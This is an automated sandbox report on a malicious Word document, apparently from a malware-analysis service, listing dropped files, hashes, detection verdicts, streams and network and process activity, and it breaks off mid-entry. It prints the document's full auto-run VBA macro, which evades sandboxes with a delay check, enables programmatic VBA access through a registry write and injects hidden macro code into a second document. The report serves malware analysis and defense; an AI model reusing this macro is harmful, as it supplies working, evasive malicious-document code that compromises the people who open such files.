Preview:	PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D\|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB.D.N..XBH.C.......L:Po0Cy...He...........h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R\|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel

C:\Users\user\AppData\Local\Temp\~WRL0002.tmp (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	22275
Entropy (8bit):	7.594783952663905
Encrypted:	false
SSDEEP:	384:/i+n6XtwyM/zeqzzzNxt/ZtNNjx3KmEOTRwwLb5MB7ha/9Q4kvaQvGwKij:/B6d7Aze8lxllNjom5wwLtys92Hr
MD5:	214513CA29E10F2AFF14A45A5C72DCDF
SHA1:	72DDD82FD8F845FC3BB0EA27AD081C77EB4F0013
SHA-256:	BE17BE2BB898626B1F3DC3AE8BA4A038C98952FA81F9F6F936AB634CB9440F0D
SHA-512:	1D709638D689CF5FEA6BAEA831826A9B697BA0C27D8C18D852D0EB7DFC10FC6F2F125A4B2C7CE2B9012761F3CEF68BA5E8EB65260719AB4A668EDB76E765031B
Malicious:	false
Preview:	PK..........!.~8.z............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.@...&.C.W..x0.P8...D\|.a;..vw.;.{{...5@U.BRf....v;...,.%...IE7.....6.T.L..[....Aa..b.A.......a.XmB.D.N..XBH.C.......L:Po0Cy...He...........h...$SmDt_.UV.......,.&K...<........"!..<....9r..MX...s...7.q.*.........Fc...%w....Z..LNc..+I..........U.f.......~`.(Z.6..o...v...#U,......ERs......!.FX....R\|.....wR]....G.. ^.X.v.....N^...z..{..W..v.I..u{GF.=.V.$......;.......PK..........!.........N......._rels/.rel

C:\Users\user\Desktop\40#U0433.doc (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	67724
Entropy (8bit):	7.825060500060554
Encrypted:	false
SSDEEP:	1536:qj/JOzG9/Us8bYCj7uPo6R464EDtV26zaVzuoZ:UEzG6s80nb46ttV26+VVZ
MD5:	5B91BC0F80C14E93496993B938AB7E75
SHA1:	173DA3BBEE274D56028AC9AACCD2CBA88D7BBE60
SHA-256:	78E94E326D636CEEE2608C075D349D2DF7AC3F5152D813A2B013FCCF8C5B56F3
SHA-512:	2A97D6066A7A186DA996E0F031B7196379DFB93BF3CD2356AC16800E8B186DE33FF6CFB83EED3D3ABB879372D19E321A06172FBD46A6C2DC7A29BDB89EDA04BB
Malicious:	true
Preview:	PK..........!....;............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.0.E.......D...(,g......(rd3.. .N...Z.....4.F.5s..1..........E5c.X...z.+.."..Jt.B........q.!....f+D...(W`D...K...#.~.%.B..K._g.K..E.Xbb....Z..}..}.F[V\.}.f..NK.T....K.ZB.i.CpO ..'..W4mR.].&@.3.....F.H..+..95.qH.....v....A..!.u.g..WN..).....%F..n.h:...v.....@...A.%.i .....W.....\|p.b$......q.A...=7o..$.".@.Fx...d)..g...u8.6Ft6.X5Q.=9.a.BA....=..{ ..b..:...>.....aNYR'.#>....c...?.K..C@}z.#.?<...

C:\Users\user\Desktop\~$#U0433.doc

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.9201639858336472
Encrypted:	false
SSDEEP:	3:ZaKlXCRl/YRlG1lllnlWllll3ZXkBIA/lDxcn:Za+XCDGGv/Q//J0Qn
MD5:	740162EC6B8A04D011DB1606BEE0CF6C
SHA1:	74463B89709B35E1C2B2FF3A19A7E865FD956CA5
SHA-256:	E26375DFE7F756DCE532D7194B91C23628AE466100891B812863AFBB21C7B054
SHA-512:	5728D94C267E9829B610DD9ECBBCAE435300ADB0AFC7E7733377027FB1EB64E4987B056427588F4F6D2297F28477809883FBE88FC7C00438D32C2626E0FDB7A1
Malicious:	false
Preview:	.user..................................................H.a.n.z.o.......9.....@=......@=......y.......................y........c...e..) .$.........e..........6...

C:\Users\user\Desktop\~WRD0000.tmp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	67724
Entropy (8bit):	7.825060500060554
Encrypted:	false
SSDEEP:	1536:qj/JOzG9/Us8bYCj7uPo6R464EDtV26zaVzuoZ:UEzG6s80nb46ttV26+VVZ
MD5:	5B91BC0F80C14E93496993B938AB7E75
SHA1:	173DA3BBEE274D56028AC9AACCD2CBA88D7BBE60
SHA-256:	78E94E326D636CEEE2608C075D349D2DF7AC3F5152D813A2B013FCCF8C5B56F3
SHA-512:	2A97D6066A7A186DA996E0F031B7196379DFB93BF3CD2356AC16800E8B186DE33FF6CFB83EED3D3ABB879372D19E321A06172FBD46A6C2DC7A29BDB89EDA04BB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	PK..........!....;............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.0.E.......D...(,g......(rd3.. .N...Z.....4.F.5s..1..........E5c.X...z.+.."..Jt.B........q.!....f+D...(W`D...K...#.~.%.B..K._g.K..E.Xbb....Z..}..}.F[V\.}.f..NK.T....K.ZB.i.CpO ..'..W4mR.].&@.3.....F.H..+..95.qH.....v....A..!.u.g..WN..).....%F..n.h:...v.....@...A.%.i .....W.....\|p.b$......q.A...=7o..$.".@.Fx...d)..g...u8.6Ft6.X5Q.=9.a.BA....=..{ ..b..:...>.....aNYR'.#>....c...?.K..C@}z.#.?<...

C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\~WRD0002.tmp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	69930
Entropy (8bit):	7.8335863678621145
Encrypted:	false
SSDEEP:	1536:qZiOWSIVzyO/Xu+JRw2Q1J6R464EDtopRVaVzuomu:d3JyMXuswG46ttovgVVmu
MD5:	26DAC68F24F22D8CC2D5054DFC9FD899
SHA1:	B03178F255B23C45C74EC73B43B6ABD2B16A383A
SHA-256:	DB36D979D08B262B79C1FA0F02A2DDA67B4C16DC5A8C98FA611A6578BE337E46
SHA-512:	8430517511D9163DFDFE67FDE2F19B703F97344EAF3DA8788C1B0D7183A2C9E2E82A55D4E3A8EFB3DCA484750013F7D55479FC6DFF5DF6D334760DB9A419D227
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	PK..........!....;............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.0.E.......D...(,g......(rd3.. .N...Z.....4.F.5s..1..........E5c.X...z.+.."..Jt.B........q.!....f+D...(W`D...K...#.~.%.B..K._g.K..E.Xbb....Z..}..}.F[V\.}.f..NK.T....K.ZB.i.CpO ..'..W4mR.].&@.3.....F.H..+..95.qH.....v....A..!.u.g..WN..).....%F..n.h:...v.....@...A.%.i .....W.....\|p.b$......q.A...=7o..$.".@.Fx...d)..g...u8.6Ft6.X5Q.=9.a.BA....=..{ ..b..:...>.....aNYR'.#>....c...?.K..C@}z.#.?<...

C:\Users\user\Desktop\~WRD0002.tmp:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\~WRL0003.tmp (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	67724
Entropy (8bit):	7.825060500060554
Encrypted:	false
SSDEEP:	1536:qj/JOzG9/Us8bYCj7uPo6R464EDtV26zaVzuoZ:UEzG6s80nb46ttV26+VVZ
MD5:	5B91BC0F80C14E93496993B938AB7E75
SHA1:	173DA3BBEE274D56028AC9AACCD2CBA88D7BBE60
SHA-256:	78E94E326D636CEEE2608C075D349D2DF7AC3F5152D813A2B013FCCF8C5B56F3
SHA-512:	2A97D6066A7A186DA996E0F031B7196379DFB93BF3CD2356AC16800E8B186DE33FF6CFB83EED3D3ABB879372D19E321A06172FBD46A6C2DC7A29BDB89EDA04BB
Malicious:	false
Preview:	PK..........!....;............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................n.0.E.......D...(,g......(rd3.. .N...Z.....4.F.5s..1..........E5c.X...z.+.."..Jt.B........q.!....f+D...(W`D...K...#.~.%.B..K._g.K..E.Xbb....Z..}..}.F[V\.}.f..NK.T....K.ZB.i.CpO ..'..W4mR.].&@.3.....F.H..+..95.qH.....v....A..!.u.g..WN..).....%F..n.h:...v.....@...A.%.i .....W.....\|p.b$......q.A...=7o..$.".@.Fx...d)..g...u8.6Ft6.X5Q.=9.a.BA....=..{ ..b..:...>.....aNYR'.#>....c...?.K..C@}z.#.?<...

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	7.983048315287433
TrID:	Word Microsoft Office Open XML Format document with Macro (52004/1) 37.96% Word Microsoft Office Open XML Format document (49504/1) 36.13% Word Microsoft Office Open XML Format document (27504/1) 20.07% ZIP compressed archive (8000/1) 5.84%
File name:	40#U0433.doc
File size:	63'332 bytes
MD5:	afe03893b7a5c589fc31f9ce9ed28a9f
SHA1:	8af5ac1b7432290e6070cf6d27a3a808db4a45b3
SHA256:	e440bad60823642e8976528bd450364ce2542d15a69778ff20996eb107158b8d
SHA512:	86f09cf8c95cc7311140130c4bb8e14249c85f6cd1837b629c3352debc2139a911833988bb6ea5c341236da0e77668af0ed77dfe87d8dede11a5ffdc63047aad
SSDEEP:	1536:qivW5gG87MhA3SzQMK7V7jJoZn4L4YoPQOfbrVhF:BvW5g13AQM8VVo44rVX
TLSH:	85530138F679A5A1C636B6B879E03A09C71CD147A71AA8742D1A73FC8007DE56F338D4
File Content Preview:	PK........,z0Y...;............[Content_Types].xml..Mn.0....z...@..EQ...h.e....F..f...;..;.....3m...k.}........+v.......B......k.....".D.4t.a-.........>`X.R-6D...Im.B.\|@...G..?.Z.P.`...b.Y.....3.jy.-l;......1N........Bg...........QX........y.v.p..fl..P

File Icon


Icon Hash:	35e1cc889a8a8599

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "40#U0433.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Title:
Author:	Windows User
Template:	Normal.dotm
Last Saved By:	Aidar Akkazynov
Revion Number:	4
Total Edit Time:	0
Create Time:	2024-09-16T07:57:00Z
Last Saved Time:	2024-09-16T09:22:00Z
Number of Pages:	3
Number of Words:	910
Number of Characters:	5187
Creating Application:	Microsoft Office Word
Security:	12

Document Summary

Number of Lines:	43
Number of Paragraphs:	12
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0000

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 5829

General
Stream Path:	VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	5829
Data ASCII:	. . . . . . . . . l . . . . . . b . . . . . . . . . V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . U e M y } u . * J . L _ \\ a . i . . . . . . . . . . . . . . . . . . . . N : W . : D D . : y W 4 . . . . . . . . . . . . . . . . . . . . . . x . . . . N : W . : D D . : y W 4 a . U e M y . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . S " . . . . S . . . . . S " . . . . > " . . . . . . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . . . . . L . .
Data Raw:	01 16 03 00 06 00 01 00 00 6c 0a 00 00 e4 00 00 00 62 02 00 00 84 0b 00 00 92 0b 00 00 56 12 00 00 03 00 00 00 01 00 00 00 f9 85 91 97 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff a0 00 ff ff 00 00 ad eb 61 83 09 55 65 4d be ac 99 79 f7 b7 e7 de 7d 75 99 07 2a 4a 15 4c 90 5f 5c 61 be 1a b0 69 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public objApp, wsl
Function danger()
        danger = ActiveDocument.Variables.Item("s2")
End Function
Function rundoc(namedoc)
        Set doc2 = objApp.Documents.Open(namedoc)
    doc2.Save
    doc2.Close
End Function
Sub verydanger()
        strng = "WSc" & "ript.She"
        strng = strng & "ll"
        Set wsl = CreateObject(strng)
        wsl.RegWrite "HK" & "CU\Softw" & "are\Micr" & "osoft\Of" & "fice\" & Application.Version & "\Wo" & "rd\Sec" & "urity\Acce" & "ssVBO" & "M", 1, "REG_D" & "WORD"
End Sub
Sub documeNt_opEn()
    On Error Resume Next
        ActiveDocument.Unprotect ("oikmseM#*inmowefj8349an3")
        For i = ActiveDocument.Shapes.Count To ActiveDocument.Shapes.Count + 1 - ActiveDocument.ActiveWindow.Panes(1).Pages.Count * 2 Step -1
                ActiveDocument.Shapes(i).Delete
        Next i
    ActiveDocument.Save
        sss = Now()
    While Now < sss + TimeValue("00:00:20")
        DoEvents
    Wend
        If Now() - sss < TimeValue("00:00:15") Then Exit Sub
        verydanger
    Set objApp = CreateObject("Word.Application")
    objApp.Visible = False
    Set doc = objApp.Documents.Add
    For Each vars In ActiveDocument.Variables
    doc.Variables.Add vars.Name & "ergegdr", vars
    i = i + 1
    Next
    doc.VBProject.VBComponents("ThisDocument").CodeModule.AddFromString "Sub goods() : : End Sub" & vbCrLf & "Sub baads() : : End Sub" & vbCrLf & danger()
    tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp")
    doc.SaveAs2 tmp & "\" & ActiveDocument.Name & ".doc", 13
    doc.Close
        rundoc (tmp & "\" & ActiveDocument.Name & ".doc")
        objApp.Quit False
End Sub

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 438

General
Stream Path:	PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	438
Entropy:	5.156275738049758
Base64 Encoded:	True
Data ASCII:	I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 8 5 8 7 2 9 B 6 2 B 3 F 2 F 3 F 2 F 3 A 3 4 3 A 3 4 " . . D P B = " 0 A 0 8 A 6 3 1 3 6 4 E 3 6 4 E C 9 B 2 3 7 4 E E 8 8 C 4 B 4 6 8 E A 9 4 7 D B E 7 C 5 D C 7 E 2 F 1 A 9 5 6 5 D
Data Raw:	49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 22 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56

Stream Path: PROJECTwm, File Type: data, Stream Size: 41

General
Stream Path:	PROJECTwm
CLSID:
File Type:	data
Stream Size:	41
Entropy:	3.0773844850752607
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3247

General
Stream Path:	VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	3247
Entropy:	4.532403418826159
Base64 Encoded:	False
Data ASCII:	a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
Data Raw:	cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 3529

General
Stream Path:	VBA/__SRP_0
CLSID:
File Type:	data
Stream Size:	3529
Entropy:	3.4180952316532593
Base64 Encoded:	False
Data ASCII:	K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ 6 . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . .
Data Raw:	93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 02 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 238

General
Stream Path:	VBA/__SRP_1
CLSID:
File Type:	data
Stream Size:	238
Entropy:	2.11560831315699
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . o b j A p p . . . . . . . . . . . . . . . . w s l . . . . . . . . . . . . . . . . n a m e d o c V . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 3577

General
Stream Path:	VBA/__SRP_2
CLSID:
File Type:	data
Stream Size:	3577
Entropy:	3.725282825620112
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . / . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 04 00 04 00 2f 00 00 00 61 0a 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 81 0d 00 00 00 00 00 00 00 00

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 420

General
Stream Path:	VBA/__SRP_3
CLSID:
File Type:	data
Stream Size:	420
Entropy:	2.3674153773884705
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . ! . . . . . . . . . . . . . . ` . . 1 . . . . . . . . . . . O . P . 1 . . . . . . . . . . . . . . ` . . 9 . . . . . 1 . . . . . . . . . . . . . . . . . O . O . 8 . . . . . . . . . . . . . . . . ` . . A . . . . . . . . . . . 8 . ! . . . . . . . . . . . . . . ` . . I . 8 . . . . . . . . . . . . . * . . . . . . . . . . . . . . . . . . . @ . . . . . . ` . . . * . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 a8 00 00 00 08 00 40 00 21 03 00 00 00 00 00 00 00 00 02 00 00 00 04 60 04 01 31 0e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: VBA/dir, File Type: VAX-order 68k Blit mpx/mux executable, Stream Size: 522

General
Stream Path:	VBA/dir
CLSID:
File Type:	VAX-order 68k Blit mpx/mux executable
Stream Size:	522
Entropy:	6.206794728607764
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . ! 8 h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ s y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . ) . . . * . \\ C . . . . . . . \\ K . . . . . r . . . & O . f f i c
Data Raw:	01 06 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 21 38 f2 68 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Network Behavior

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 21:37:46.314085960 CET	1.1.1.1	192.168.2.27	0x7f97	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	84.201.210.39	A (IP address)	IN (0x0001)	false
Jan 13, 2025 21:37:46.314085960 CET	1.1.1.1	192.168.2.27	0x7f97	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.57.19	A (IP address)	IN (0x0001)	false
Jan 13, 2025 21:37:46.314085960 CET	1.1.1.1	192.168.2.27	0x7f97	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.57.36	A (IP address)	IN (0x0001)	false
Jan 13, 2025 21:37:46.314085960 CET	1.1.1.1	192.168.2.27	0x7f97	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.57.18	A (IP address)	IN (0x0001)	false
Jan 13, 2025 21:37:46.314085960 CET	1.1.1.1	192.168.2.27	0x7f97	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.57.35	A (IP address)	IN (0x0001)	false
Jan 13, 2025 21:37:46.314085960 CET	1.1.1.1	192.168.2.27	0x7f97	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.57.20	A (IP address)	IN (0x0001)	false
Jan 13, 2025 21:37:46.314085960 CET	1.1.1.1	192.168.2.27	0x7f97	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.57.34	A (IP address)	IN (0x0001)	false
Jan 13, 2025 21:37:46.314085960 CET	1.1.1.1	192.168.2.27	0x7f97	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	84.201.210.23	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	15:37:50
Start date:	13/01/2025
Path:	C:\Windows\System32\appidpolicyconverter.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\appidpolicyconverter.exe"
Imagebase:	0x7ff7d8370000
File size:	155'648 bytes
MD5 hash:	6567D9CF2545FAAC60974D9D682700D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:37:50
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6adf60000
File size:	1'040'384 bytes
MD5 hash:	9698384842DA735D80D278A427A229AB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:37:50
Start date:	13/01/2025
Path:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x7ff7e8c00000
File size:	1'637'952 bytes
MD5 hash:	A9F0EC89897AC6C878D217DFB64CA752
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:38:14
Start date:	13/01/2025
Path:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit):	false
